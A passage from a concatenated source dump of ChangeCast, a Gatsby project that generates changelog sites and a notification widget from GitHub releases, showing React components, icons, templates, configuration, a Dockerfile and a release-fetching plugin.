import { CHANGECAST_LOCALSTORAGE_KEY } from '../utils/constants'
export const SiteProvider = ({ children }) => {
React.useEffect(() => {
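    // record the visit time; presumably the same localStorage key the widget's unread badge compares release dates against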
window.localStorage.setItem(
CHANGECAST_LOCALSTORAGE_KEY,
new Date().toISOString()
)
}, [])
return children
}
<|start_filename|>docs/src/templates/IndexTemplate.js<|end_filename|>
import { Global } from '@emotion/core'
import { graphql } from 'gatsby'
import React from 'react'
import Helmet from 'react-helmet'
import { Anchor } from '../components/Anchor'
import { ButtonContainer } from '../components/Button/ButtonContainer'
import { GlowingAnchorButton } from '../components/Button/GlowingAnchorButton'
import { GlowingButton } from '../components/Button/GlowingButton'
import { CenteredText } from '../components/CenteredText'
import { CenteredTitle } from '../components/CenteredTitle'
import { Favicons } from '../components/Favicons'
import { Feature } from '../components/Feature'
import { Features } from '../components/Features'
import { FocusStyles } from '../components/FocusStyles'
import { Footer } from '../components/Footer'
import { Header } from '../components/Header'
import { Section } from '../components/Section'
import { globalStyles } from '../styles/global'
const url = 'https://changecast.now.sh'
const title = 'ChangeCast'
const description =
'Create beautiful, performant, accessible changelogs from your Github releases.'
const IndexTemplate = ({
data: {
site: {
siteMetadata: {
exampleSiteUrls: [reactBeautifulDndUrl, materialUiUrl, workboxUrl],
},
},
logo: {
childFavicon: { faviconElements },
childOgImage: {
ogImageWithText: { src: ogImgSrc },
},
},
},
}) => (
<>
<FocusStyles />
<Global styles={globalStyles} />
<Favicons favicons={faviconElements} />
<Helmet
title={title}
meta={[
{ property: 'og:title', content: title },
{ name: 'description', content: description },
{
property: 'og:url',
content: url,
},
{
property: 'og:image',
content: `${url}${ogImgSrc}`,
},
{
name: 'twitter:url',
content: url,
},
{ name: 'twitter:title', content: title },
{
name: 'twitter:image',
content: `${url}${ogImgSrc}`,
},
]}
/>
{(process.env.NODE_ENV === 'development' ||
typeof window === 'undefined') && (
<Helmet>
<script
src={`${reactBeautifulDndUrl}/widget.js`}
data-selectors="[data-react-beautiful-dnd-changecast]"
defer
/>
<script
src={`${materialUiUrl}/widget.js`}
data-selectors="[data-material-ui-changecast]"
defer
/>
<script
src={`${workboxUrl}/widget.js`}
data-selectors="[data-workbox-changecast]"
defer
/>
<script
src="https://changecast-log.netlify.com/widget.js"
data-selectors="[data-changecast-changecast]"
defer
/>
</Helmet>
)}
<Header />
<Section background="black">
<CenteredTitle color="white">How does it work?</CenteredTitle>
<CenteredText color="white">
ChangeCast generates a static site and widget from your Github releases.
Adding these to your project homepage will keep users informed of any
updates you make. Click on the examples below to see ChangeCast in
action!
</CenteredText>
<ButtonContainer>
<GlowingButton
data-react-beautiful-dnd-changecast
css={{
marginRight: 30,
}}
>
React Beautiful DnD
</GlowingButton>
<GlowingButton
data-material-ui-changecast
css={{
marginRight: 30,
}}
>
Material UI
</GlowingButton>
<GlowingButton data-workbox-changecast>Workbox</GlowingButton>
</ButtonContainer>
</Section>
<Section background="white">
<CenteredTitle color="black">What are the features?</CenteredTitle>
<CenteredText color="black">
ChangeCast comes with every feature you need to easily communicate
project updates. If you think something is missing, please{' '}
<Anchor href="https://github.com/palmerhq/changecast/issues/new">
open an issue
</Anchor>
!
</CenteredText>
<Features>
<Feature title="Built-in Widget">
Our widget notifies users of new updates and allows them to view
release notes without leaving your site.
</Feature>
<Feature title="Themeable">
Our site and widget are built with your Github avatar's color scheme
and can be overridden with any color you choose.
</Feature>
<Feature title="Shareable">
Each release comes with its own shareable link and Open Graph image
that looks great when shared on social media.
</Feature>
<Feature title="Searchable">
Users can search the text of each release to find the feature or
update they are looking for.
</Feature>
<Feature title="Accessible">
We follow the{' '}
<Anchor href="https://www.w3.org/TR/WCAG21/">
WCAG 2.1 Standard
</Anchor>{' '}
to ensure your project updates can reach everyone.
</Feature>
<Feature title="Blazing Fast">
Built on top of{' '}
<Anchor href="https://www.gatsbyjs.org">Gatsby</Anchor>, your site and
widget are tuned for a fast experience out of the box.
</Feature>
</Features>
</Section>
<Section background="black">
<CenteredTitle color="white">How do I get started?</CenteredTitle>
<CenteredText color="white">
ChangeCast can be built and deployed on{' '}
<Anchor
href="https://www.netlify.com"
css={{ color: 'white', ':visited': { color: 'white' } }}
>
Netlify
</Anchor>
,{' '}
<Anchor
href="https://zeit.co/now"
css={{ color: 'white', ':visited': { color: 'white' } }}
>
Now
</Anchor>
, or any other static hosting service. And, using a Github webhook or
action, you can configure ChangeCast to redeploy whenever you cut a new
release.
</CenteredText>
<div css={{ textAlign: 'center', color: 'white', marginBottom: 30 }}>
<GlowingAnchorButton href="https://github.com/palmerhq/changecast#getting-started">
Get Started
</GlowingAnchorButton>
</div>
</Section>
<Footer />
</>
)
export const query = graphql`
query IndexQuery($ogText: String!) {
site {
siteMetadata {
exampleSiteUrls
}
}
logo: file(relativePath: { eq: "ChangeCastTransparent.png" }) {
childFavicon {
faviconElements {
props
type
}
}
childOgImage {
ogImageWithText(text: $ogText) {
src
}
}
}
}
`
export default IndexTemplate
<|start_filename|>fonts/fonts.css<|end_filename|>
@font-face {
font-family: 'Inter Regular';
font-style: normal;
font-weight: 400;
src: url('https://cdn.jsdelivr.net/npm/inter-ui@3.5.0/Inter (web)/Inter-Regular.woff')
format('woff');
font-display: fallback;
}
@font-face {
font-family: 'Inter Italic';
font-style: italic;
font-weight: 400;
src: url('https://cdn.jsdelivr.net/npm/inter-ui@3.5.0/Inter (web)/Inter-Italic.woff')
format('woff');
font-display: fallback;
}
@font-face {
font-family: 'Inter SemiBold';
font-style: normal;
font-weight: 600;
src: url('https://cdn.jsdelivr.net/npm/inter-ui@3.5.0/Inter (web)/Inter-SemiBold.woff')
format('woff');
font-display: fallback;
}
@font-face {
font-family: 'Inter SemiBold Italic';
font-style: italic;
font-weight: 600;
src: url('https://cdn.jsdelivr.net/npm/inter-ui@3.5.0/Inter (web)/Inter-SemiBoldItalic.woff')
format('woff');
font-display: fallback;
}
@font-face {
font-family: 'Inter Bold';
font-style: normal;
font-weight: 700;
src: url('https://cdn.jsdelivr.net/npm/inter-ui@3.5.0/Inter (web)/Inter-Bold.woff')
format('woff');
font-display: fallback;
}
@font-face {
font-family: 'Inter Bold Italic';
font-style: italic;
font-weight: 700;
src: url('https://cdn.jsdelivr.net/npm/inter-ui@3.5.0/Inter (web)/Inter-BoldItalic.woff')
format('woff');
font-display: fallback;
}
<|start_filename|>docs/src/components/Footer.js<|end_filename|>
import { Radio } from 'icons/Radio'
import React from 'react'
import { AnchorButton } from './Button/AnchorButton'
import { Button } from './Button/Button'
import { LinkButton } from './Button/LinkButton'
export const Footer = () => (
<div
css={{
backgroundColor: '#F6F6F6',
}}
>
<div
css={{
marginRight: 'auto',
marginLeft: 'auto',
padding: '0 15px',
maxWidth: '1080px',
}}
>
<div
css={{
padding: '40px 0',
textAlign: 'center',
}}
>
<ul
css={{
padding: '0',
margin: '0',
listStyle: 'none',
}}
>
<li
css={{
marginBottom: '10px',
}}
>
<AnchorButton
href="https://github.com/palmerhq/changecast"
css={{ color: 'black' }}
>
Github
</AnchorButton>
</li>
<li
css={{
marginBottom: '10px',
}}
>
<Button css={{ color: 'black' }} data-changecast-changecast={true}>
What's New?
</Button>
</li>
<li
css={{
display: 'flex',
justifyContent: 'center',
}}
>
<LinkButton
to="/"
css={{
display: 'flex',
alignItems: 'center',
}}
>
<Radio css={{ color: 'black' }} />
<span
css={{
fontWeight: 'bold',
color: 'black',
marginLeft: '1rem',
}}
>
ChangeCast
</span>
</LinkButton>
</li>
</ul>
</div>
</div>
</div>
)
<|start_filename|>docs/gatsby-config.js<|end_filename|>
const path = require('path')
const { config } = require('dotenv')
config({ path: path.resolve('..', '.env') })
module.exports = {
siteMetadata: {
exampleSiteUrls: [
process.env.FIRST_EXAMPLE_URL,
process.env.SECOND_EXAMPLE_URL,
process.env.THIRD_EXAMPLE_URL,
],
},
plugins: [
'gatsby-plugin-emotion',
'gatsby-plugin-react-helmet',
{
resolve: 'gatsby-transformer-og-image',
options: {
fontPath: '../fonts/Inter-SemiBold.woff',
fontColor: '#24292e',
backgroundColor: '#f7f7f7',
},
},
'gatsby-transformer-favicons',
{
resolve: `gatsby-plugin-typography`,
options: {
pathToConfigModule: `src/styles/typography`,
},
},
`gatsby-transformer-sharp`,
`gatsby-plugin-sharp`,
{
resolve: `gatsby-source-filesystem`,
options: {
name: `images`,
path: path.join(__dirname, `src`, `images`),
},
},
{
resolve: `gatsby-plugin-google-analytics`,
options: {
trackingId: 'UA-139165006-1',
},
},
],
}
<|start_filename|>docs/src/components/Button/ButtonContainer.js<|end_filename|>
import React from 'react'
export const ButtonContainer = ({ children }) => (
<div
css={{
padding: '0 15px',
marginLeft: 'auto',
marginRight: 'auto',
textAlign: 'center',
maxWidth: '700px',
display: 'flex',
justifyContent: 'center',
'@media (max-width: 600px)': {
display: 'block',
'> button': {
display: 'block',
margin: '0 auto 30px auto',
},
},
}}
>
{children}
</div>
)
<|start_filename|>docs/src/components/Button/GlowingButton.js<|end_filename|>
import React from 'react'
export const glowingButtonStyles = color => ({
margin: '0',
padding: '12px 20px 12px',
borderRadius: '4px',
backgroundColor: color,
boxShadow: `0 3px 26px -2px ${color}`,
color: 'white',
display: 'inline-block',
cursor: 'pointer',
textDecoration: 'none',
border: 'none',
userSelect: 'none',
transition: 'transform 200ms ease',
':hover': {
transform: 'translateY(-2px)',
},
})
export const GlowingButton = ({ color = 'royalblue', ...props }) => (
<button css={glowingButtonStyles(color)} {...props} />
)
<|start_filename|>site/src/components/Release/SocialButton.js<|end_filename|>
import Tooltip from '@reach/tooltip'
import '@reach/tooltip/styles.css'
import VisuallyHidden from '@reach/visually-hidden'
import React from 'react'
import { theme } from '../../styles/theme'
import { Button } from '../Button/Button'
export const SocialButton = ({ label, icon: Icon, ...rest }) => (
<Tooltip
label={label}
css={{
borderRadius: 3,
border: '1px solid lightgray',
background: 'white',
}}
>
<Button css={{ padding: '0.5rem' }} {...rest}>
<Icon
css={{
height: '1.2rem',
width: '1.2rem',
color: theme.color.accent,
}}
/>
<VisuallyHidden>{label}</VisuallyHidden>
</Button>
</Tooltip>
)
<|start_filename|>site/src/components/Header.js<|end_filename|>
import VisuallyHidden from '@reach/visually-hidden'
import { Link } from 'gatsby'
import { Close } from 'icons/Close'
import { ExternalLink } from 'icons/ExternalLink'
import React from 'react'
import { onClose } from '../providers/WidgetProvider'
import { theme } from '../styles/theme'
import { AnchorButton } from './Button/AnchorButton'
import { Button } from './Button/Button'
export const Header = ({
primaryColor: [red, green, blue],
setSearchValue,
logoSrc,
homepage,
htmlUrl,
searchValue,
isWidget,
}) => (
<header
css={{
position: 'fixed',
background: `rgb(${red}, ${green}, ${blue})`,
color: 'white',
width: '100%',
zIndex: 1,
height: 54,
display: 'flex',
alignItems: 'center',
boxShadow: '0 1px 6px 0 rgba(32,33,36,0.28)',
}}
>
<div
css={{
width: '100%',
maxWidth: 800,
margin: '0 auto',
display: 'flex',
alignItems: 'center',
justifyContent: 'space-between',
padding: '0 0.5rem',
}}
>
{logoSrc && !isWidget && (
<Link to="/" css={{ flexShrink: 0 }}>
<img
src={logoSrc}
alt=""
css={{
display: 'block',
borderRadius: 3,
margin: 0,
background: '#f7f7f7',
height: 34,
width: 34,
border: '2px solid #f7f7f7',
}}
/>
</Link>
)}
<div
css={{
background: 'white',
borderRadius: 34,
flexGrow: 1,
marginLeft: '0.5rem',
position: 'relative',
}}
>
<input
placeholder="Search"
css={{
width: '100%',
background: !!searchValue
? `rgba(${red}, ${green}, ${blue}, 0.1)`
: `rgba(${red}, ${green}, ${blue}, 0.9)`,
border: '1px solid transparent',
borderRadius: '4px',
padding: '0.25rem 2rem 0.25rem 0.75rem',
WebkitAppearance: 'none',
'::placeholder': {
color: 'white',
},
// @todo improve performance by animating opacity
transition: 'background 100ms ease-in, color 100ms 50ms linear',
':focus': {
background: `rgb(${red}, ${green}, ${blue}, 0.1)`,
'::placeholder': {
color: 'inherit',
},
},
}}
value={searchValue}
onChange={({ target: { value } }) => setSearchValue(value)}
/>
{searchValue && (
<Button
onClick={() => setSearchValue('')}
css={{
position: 'absolute',
marginRight: '0.25rem',
borderRadius: '50%',
padding: '0.25rem',
right: 0,
':hover': {
background: 'initial',
},
}}
>
<Close css={{ color: theme.color.accent, width: 22, height: 22 }} />
<VisuallyHidden>Clear search</VisuallyHidden>
</Button>
)}
</div>
{isWidget ? (
<Button
onClick={onClose}
css={{
marginLeft: '0.5rem',
padding: '0.25rem',
}}
>
<Close />
<VisuallyHidden>Close</VisuallyHidden>
</Button>
) : (
<AnchorButton
href={homepage || htmlUrl}
target="_blank"
rel="noopener noreferrer"
css={{ marginLeft: '0.5rem' }}
>
{homepage ? 'Homepage' : 'Github'}
<ExternalLink
css={{
marginLeft: '0.25rem',
height: '1.2rem',
width: '1.2rem',
flexShrink: 0,
}}
/>
</AnchorButton>
)}
</div>
</header>
)
<|start_filename|>docs/src/components/Button/GlowingAnchorButton.js<|end_filename|>
import React from 'react'
import { glowingButtonStyles } from './GlowingButton'
export const GlowingAnchorButton = ({ color = 'royalblue', ...props }) => (
<a css={glowingButtonStyles(color)} {...props} />
)
<|start_filename|>docs/src/components/CenteredTitle.js<|end_filename|>
import React from 'react'
export const CenteredTitle = ({ color, children }) => (
<div
css={{
marginLeft: 'auto',
marginRight: 'auto',
textAlign: 'center',
marginBottom: 15,
maxWidth: 700,
}}
>
<h2
css={{
marginTop: 0,
fontSize: '2em',
color,
}}
>
{children}
</h2>
</div>
)
<|start_filename|>docs/src/components/Link.js<|end_filename|>
import { Link as GatsbyLink } from 'gatsby'
import isAbsoluteURL from 'is-absolute-url'
import React from 'react'
export const Link = ({ href, ...props }) =>
isAbsoluteURL(href || '') ? (
<a href={href} {...props} />
) : (
<GatsbyLink to={href} {...props} activeClassName="active" />
)
<|start_filename|>site/src/templates/ReleaseTemplate.js<|end_filename|>
import { Global } from '@emotion/core'
import { graphql } from 'gatsby'
import { ChevronLeft } from 'icons/ChevronLeft'
import debounce from 'just-debounce-it'
import Mark from 'mark.js'
import React from 'react'
import Helmet from 'react-helmet'
import { LinkButton } from '../components/Button/LinkButton'
import { Favicons } from '../components/Favicons'
import { FocusStyles } from '../components/FocusStyles'
import { Header } from '../components/Header'
import { Release } from '../components/Release/Release'
import { SiteWrapper } from '../components/SiteWrapper'
import { useSiteSetup } from '../hooks/useSiteSetup'
import { globalStyles } from '../styles/global'
import { getOgImageSrc } from '../utils/data'
const ReleaseTemplate = ({
data,
data: {
release: {
name: releaseName,
tagName,
publishedAt,
childGithubReleaseBody: {
childMarkdownRemark: { html, plainText },
},
},
},
pageContext: { isWidget },
}) => {
const tagOgImageSrc = getOgImageSrc(data)
const [searchValue, setSearchValue] = React.useState('')
const mark = React.useRef()
const search = React.useRef(null)
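  // Lazily create (and cache in a ref) the search handler: it updates the
  // controlled input right away but debounces the mark.js highlighting so
  // typing stays responsive.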
function getReleaseSearch() {
if (search.current !== null) {
return search.current
}
const debouncedMark = debounce(value => {
if (mark.current) {
mark.current.unmark()
}
mark.current = new Mark(document.querySelectorAll('.release'))
mark.current.mark(value)
}, 100)
search.current = value => {
setSearchValue(value)
debouncedMark(value)
}
return search.current
}
const {
faviconElements,
primaryColor,
logoSrc,
title,
description,
homepage,
url,
htmlUrl,
} = useSiteSetup()
const siteTitle = `${title} ${tagName}`
return (
<>
<Favicons favicons={faviconElements} />
<Global styles={globalStyles} />
<FocusStyles />
<Helmet
title={siteTitle}
meta={[
{ property: 'og:title', content: siteTitle },
{ name: 'description', content: description },
{
property: 'og:url',
content: `${url}/${tagName}`,
},
{
property: 'og:image',
content: `${url}${tagOgImageSrc}`,
},
{ name: 'twitter:card', content: 'summary_large_image' },
{
name: 'twitter:url',
content: `${url}/${tagName}`,
},
{ name: 'twitter:title', content: `${title} ${tagName}` },
{
name: 'twitter:image',
content: `${url}${tagOgImageSrc}`,
},
]}
/>
<Header
homepage={homepage}
htmlUrl={htmlUrl}
logoSrc={logoSrc}
primaryColor={primaryColor}
setSearchValue={getReleaseSearch()}
searchValue={searchValue}
/>
<SiteWrapper>
<LinkButton to="/" css={{ marginBottom: '0.5rem' }}>
<ChevronLeft css={{ marginLeft: '-0.25rem' }} /> All Releases
</LinkButton>
<Release
releaseName={releaseName}
tagName={tagName}
publishedAt={publishedAt}
html={html}
plainText={plainText}
embeddedInIframe={false}
primaryColor={primaryColor}
url={url}
/>
</SiteWrapper>
</>
)
}
export const query = graphql`
query ReleaseTemplateQuery($tagName: String!, $ogText: String!) {
repository: allGithubRepo {
edges {
node {
avatarImageFile: childFile {
childOgImage {
ogImageWithText(text: $ogText) {
src
}
}
}
}
}
}
logo: allFile(filter: { name: { eq: "logo" } }) {
edges {
node {
childOgImage {
ogImageWithText(text: $ogText) {
src
}
}
}
}
}
release: githubRelease(tagName: { eq: $tagName }) {
name
tagName
publishedAt
childGithubReleaseBody {
childMarkdownRemark {
html
plainText
}
}
}
}
`
export default ReleaseTemplate
<|start_filename|>Dockerfile<|end_filename|>
FROM node:10
COPY . /changecast
RUN cd /changecast && yarn
ENTRYPOINT ["/changecast/action/entrypoint.sh"]
LABEL "com.github.actions.name"="ChangeCast"
LABEL "com.github.actions.description"="Create beautiful, performant, accessible changelogs from your Github releases."
LABEL "com.github.actions.icon"="radio"
LABEL "com.github.actions.color"="blue"
<|start_filename|>icons/ExternalLink.js<|end_filename|>
import React from 'react'
export const ExternalLink = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="ExternalLink_svg__feather ExternalLink_svg__feather-external-link"
{...props}
>
<path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6M15 3h6v6M10 14L21 3" />
</svg>
)
<|start_filename|>site/src/components/Button/AnchorButton.js<|end_filename|>
import React from 'react'
import { buttonStyles } from './Button'
export const AnchorButton = props => <a css={buttonStyles} {...props} />
<|start_filename|>icons/AbstractIcon3.js<|end_filename|>
import React from 'react'
export const AbstractIcon3 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<defs>
<rect
id="AbstractIcon3_svg__a"
x={5.44}
width={8.56}
height={8.56}
rx={4.28}
/>
</defs>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<g transform="translate(13 16)">
<rect fill="#4D61FC" width={8.56} height={8.56} rx={4.28} />
<use fill="#00396B" xlinkHref="#AbstractIcon3_svg__a" />
<rect
stroke="#E9F1FF"
x={4.94}
y={-0.5}
width={9.56}
height={9.56}
rx={4.78}
/>
</g>
</g>
</svg>
)
<|start_filename|>site/src/providers/WidgetProvider.js<|end_filename|>
import React from 'react'
import { CHANGECAST_LOCALSTORAGE_KEY } from '../utils/constants'
export function onClose() {
window.parent.postMessage('close', '*')
}
function closeOnEscape(e) {
if (e.key === 'Escape' || e.key === 'Esc' || e.keyCode === 27) {
e.preventDefault()
onClose()
}
}
export const WidgetContext = React.createContext(true)
export const WidgetProvider = ({ children }) => {
const [isOpen, setOpen] = React.useState(false)
const handleMessage = React.useCallback(event => {
if (event.data === 'open') {
setOpen(true)
window.localStorage.setItem(
CHANGECAST_LOCALSTORAGE_KEY,
new Date().toISOString()
)
} else if (event.data === 'close') {
setOpen(false)
}
})
React.useEffect(() => {
window.addEventListener('keydown', closeOnEscape, false)
window.addEventListener('message', handleMessage, true)
return () => {
window.removeEventListener('keydown', closeOnEscape)
window.removeEventListener('message', handleMessage)
}
})
return (
<WidgetContext.Provider value={isOpen}>{children}</WidgetContext.Provider>
)
}
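// The provider only reacts to `message` events whose data is the string
// 'open' or 'close'. A host page embedding this site in an iframe could
// therefore toggle the widget with something like (illustrative sketch, not
// necessarily the actual widget.js implementation):
//
//   iframe.contentWindow.postMessage('open', '*')   // show the changelog
//   iframe.contentWindow.postMessage('close', '*')  // hide it again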
<|start_filename|>site/src/styles/global.js<|end_filename|>
import { css } from '@emotion/core'
import '@reach/menu-button/styles.css'
import { theme } from './theme'
import { fonts } from './typography'
export const globalStyles = css`
* {
box-sizing: border-box;
}
html,
body {
font-family: ${fonts.regular}, sans-serif;
font-size: 16px;
font-weight: 400;
font-style: normal;
color: ${theme.color.text};
background: #f7f7f7;
text-rendering: optimizeLegibility;
-webkit-font-smoothing: antialiased;
-webkit-tap-highlight-color: transparent;
-ms-overflow-style: scrollbar;
}
a {
text-decoration: none;
&:hover {
text-decoration: underline;
}
}
`
<|start_filename|>site/src/components/WidgetWrapper.js<|end_filename|>
import React from 'react'
import { WidgetContext } from '../providers/WidgetProvider'
import { theme } from '../styles/theme'
export const WidgetWrapper = ({ children }) => {
const isOpen = React.useContext(WidgetContext)
return (
<main
css={{
width: '100vw',
height: '100vh',
paddingTop: 'calc(0.5rem + 54px)',
[theme.media.small]: {
padding: 'calc(0.5rem + 54px) 0.5rem 0.5rem 0.5rem',
},
overflow: isOpen ? 'scroll' : 'hidden',
WebkitOverflowScrolling: 'touch',
}}
>
{children}
</main>
)
}
<|start_filename|>docs/src/components/CenteredText.js<|end_filename|>
import React from 'react'
export const CenteredText = ({ color, children }) => (
<div
css={{
marginLeft: 'auto',
marginRight: 'auto',
textAlign: 'center',
marginBottom: 50,
maxWidth: 700,
}}
>
<p
css={{
marginLeft: 'auto',
marginRight: 'auto',
opacity: '0.9',
maxWidth: '80%',
color,
}}
>
{children}
</p>
</div>
)
<|start_filename|>site/src/components/FocusStyles.js<|end_filename|>
import React from 'react'
import { css, Global } from '@emotion/core'
const navigationKeyCodes = [9, 13, 27, 38, 40]
const zeroFocusOutline = css`
*:focus {
outline: 0;
}
`
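// Show focus outlines only for keyboard users: suppress them globally until a
// navigation key (Tab, Enter, Esc, up/down arrows) is pressed, and hide them
// again on the next mouse click.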
export const FocusStyles = () => {
const [usingKeyboard, setUsingKeyboard] = React.useState(false)
const checkUsingKeyboard = React.useCallback(({ keyCode }) => {
if (navigationKeyCodes.includes(keyCode)) {
setUsingKeyboard(true)
}
}, [])
const notUsingKeyboard = React.useCallback(() => setUsingKeyboard(false), [])
React.useEffect(() => {
window.addEventListener('keyup', checkUsingKeyboard)
window.addEventListener('click', notUsingKeyboard)
return () => {
window.removeEventListener('keyup', checkUsingKeyboard)
window.removeEventListener('click', notUsingKeyboard)
}
}, [])
return <Global styles={usingKeyboard ? {} : zeroFocusOutline} />
}
<|start_filename|>plugins/gatsby-source-github-releases/gatsby-node.js<|end_filename|>
const Octokat = require('octokat')
const md5 = require('md5')
const parseGitUrl = require('git-url-parse')
const { linkify } = require('linkify-markdown')
const { createRemoteFileNode } = require(`gatsby-source-filesystem`)
exports.sourceNodes = async (
{ actions: { createNode }, createNodeId, createContentDigest, store, cache },
pluginOptions
) => {
const { owner, name } = parseGitUrl(pluginOptions.url)
const octo = new Octokat({ token: pluginOptions.token })
const repoResource = octo.repos(owner, name)
const repo = await repoResource.fetch()
const repoId = createNodeId(repo.fullName)
const repoContent = JSON.stringify(repo)
const releases = await repoResource.releases.fetchAll()
const releaseIds = []
releases.forEach(release => {
const releaseId = createNodeId(release.tagName)
const releaseBodyId = createNodeId(`${release.tagName}_body`)
const releaseContent = JSON.stringify(release)
releaseIds.push(releaseId)
createNode({
...release,
id: releaseId,
parent: repoId,
children: [releaseBodyId],
internal: {
type: 'GithubRelease',
contentDigest: createContentDigest(releaseContent),
content: releaseContent,
},
})
const releaseBodyContent = linkify(release.body, {
repository: pluginOptions.url,
})
createNode({
id: releaseBodyId,
parent: releaseId,
children: [],
internal: {
type: 'GithubReleaseBody',
mediaType: 'text/markdown',
contentDigest: createContentDigest(releaseBodyContent),
content: releaseBodyContent,
},
})
})
const avatarImageFile = await createRemoteFileNode({
url: repo.owner.avatarUrl,
store,
cache,
createNode,
createNodeId,
})
createNode({
homepage: null,
...repo,
id: repoId,
parent: null,
children: [...releaseIds, avatarImageFile.id],
internal: {
type: 'GithubRepo',
contentDigest: createContentDigest(repoContent),
content: repoContent,
},
})
}
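// The nodes created above surface in GraphQL as `GithubRepo`, `GithubRelease`
// and `GithubReleaseBody`. The release template queries them like this
// (see site/src/templates/ReleaseTemplate.js):
//
//   release: githubRelease(tagName: { eq: $tagName }) {
//     name
//     tagName
//     publishedAt
//     childGithubReleaseBody {
//       childMarkdownRemark {
//         html
//         plainText
//       }
//     }
//   }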
<|start_filename|>docs/package.json<|end_filename|>
{
"name": "changecast-docs",
"private": true,
"description": "ChangeCast documentation and landing page.",
"version": "0.1.0",
"author": "<NAME> <<EMAIL>>",
"license": "MIT",
"scripts": {
"build": "gatsby build",
"develop": "gatsby develop",
"serve": "gatsby serve",
"now-build": "yarn build"
},
"dependencies": {
"@emotion/core": "^10.0.10",
"gatsby": "^2.1.22",
"gatsby-image": "^2.0.37",
"gatsby-plugin-emotion": "^4.0.4",
"gatsby-plugin-google-analytics": "^2.0.18",
"gatsby-plugin-react-helmet": "^3.0.7",
"gatsby-plugin-sharp": "^2.0.32",
"gatsby-plugin-typography": "^2.2.10",
"gatsby-source-filesystem": "^2.0.23",
"gatsby-transformer-favicons": "file:../plugins/gatsby-transformer-favicons",
"gatsby-transformer-og-image": "file:../plugins/gatsby-transformer-og-image",
"gatsby-transformer-sharp": "^2.1.17",
"icons": "0.1.0",
"normalize.css": "^8.0.1",
"react": "^16.8.1",
"react-dom": "^16.8.1",
"react-helmet": "^5.2.0",
"react-typography": "^0.16.19",
"typography": "^0.16.19"
},
"devDependencies": {}
}
<|start_filename|>site/src/utils/constants.js<|end_filename|>
export const CHANGECAST_LOCALSTORAGE_KEY = 'changecast'
<|start_filename|>site/src/components/Button/LinkButton.js<|end_filename|>
import { Link } from 'gatsby'
import React from 'react'
import { buttonStyles } from './Button'
export const LinkButton = props => <Link css={buttonStyles} {...props} />
<|start_filename|>site/src/hooks/useSiteSetup.js<|end_filename|>
import { graphql, useStaticQuery } from 'gatsby'
import {
getFaviconElements,
getLogoSrc,
getPrimaryColor,
getTitle,
} from '../utils/data'
export const useSiteSetup = () => {
const data = useStaticQuery(graphql`
query SiteSetupQuery {
site {
siteMetadata {
title
primaryColor
url
}
}
repository: allGithubRepo {
edges {
node {
name
description
homepage
htmlUrl
avatarImageFile: childFile {
fields {
colorPalette
}
childImageSharp {
original {
src
}
}
childFavicon {
faviconElements {
props
type
}
}
}
}
}
}
logo: allFile(filter: { name: { eq: "logo" } }) {
edges {
node {
fields {
colorPalette
}
childImageSharp {
original {
src
}
}
childFavicon {
faviconElements {
props
type
}
}
}
}
}
}
`)
const {
site: {
siteMetadata: { url },
},
repository: {
edges: [
{
node: { description, homepage, htmlUrl },
},
],
},
} = data
const primaryColor = getPrimaryColor(data)
const logoSrc = getLogoSrc(data)
const title = getTitle(data)
const faviconElements = getFaviconElements(data)
return {
faviconElements,
primaryColor,
logoSrc,
title,
description,
homepage,
htmlUrl,
url,
}
}
<|start_filename|>icons/AbstractIcon6.js<|end_filename|>
import React from 'react'
export const AbstractIcon6 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<g fillRule="nonzero">
<path
d="M19.607 19.275h.025a3.14 3.14 0 0 0 3.137-3.138A3.14 3.14 0 0 0 19.632 13 6.64 6.64 0 0 0 13 19.632a6.639 6.639 0 0 0 3.643 5.919 3.832 3.832 0 0 1-.862-2.425 3.855 3.855 0 0 1 3.826-3.85z"
fill="#4D61FC"
/>
<path
d="M23.357 14.45c.539.662.862 1.506.862 2.424a3.855 3.855 0 0 1-3.85 3.851 3.14 3.14 0 0 0-3.138 3.138A3.14 3.14 0 0 0 20.368 27h.003A6.64 6.64 0 0 0 27 20.368a6.639 6.639 0 0 0-3.643-5.918z"
fill="#00396B"
/>
</g>
</g>
</svg>
)
<|start_filename|>docs/src/components/Section.js<|end_filename|>
import React from 'react'
export const Section = ({ background, children }) => (
<div css={{ padding: '120px 15px', background }}>{children}</div>
)
<|start_filename|>icons/AbstractIcon5.js<|end_filename|>
import React from 'react'
export const AbstractIcon5 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<g transform="translate(12 13)">
<rect fill="#4D61FC" x={5} width={6} height={6} rx={3} />
<rect fill="#4D61FC" y={8} width={6} height={6} rx={3} />
<rect fill="#00396B" x={10} y={8} width={6} height={6} rx={3} />
</g>
</g>
</svg>
)
<|start_filename|>site/src/styles/theme.js<|end_filename|>
const fontSize = '16px'
const color = {
text: '#24292e',
accent: '#586069',
}
const breakpoint = {
small: 400,
medium: 800,
large: 1200,
xlarge: 1600,
}
const media = {
small: `@media(min-width: ${breakpoint.small}px)`,
medium: `@media(min-width: ${breakpoint.medium}px)`,
large: `@media(min-width: ${breakpoint.large}px)`,
xlarge: `@media(min-width: ${breakpoint.xlarge}px)`,
}
const markdown = {
color: {
blockquote: '#24292e',
accent: '#d6d6d6',
background: 'white',
text: '#24292e',
},
}
const code = {
color: {
background: 'initial',
comment: 'gray',
punctuation: 'black',
deleted: 'red',
inserted: 'green',
string: 'black',
keyword: 'black',
function: 'black',
variable: 'black',
},
}
export const theme = {
fontSize,
color,
breakpoint,
media,
markdown,
code,
}
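// Example usage (as in components/Header.js and Release/Release.js):
//
//   import { theme } from '../styles/theme'
//
//   const styles = {
//     color: theme.color.accent,
//     [theme.media.small]: { borderRadius: 3 },
//   }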
<|start_filename|>icons/AbstractIcon8.js<|end_filename|>
import React from 'react'
export const AbstractIcon8 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
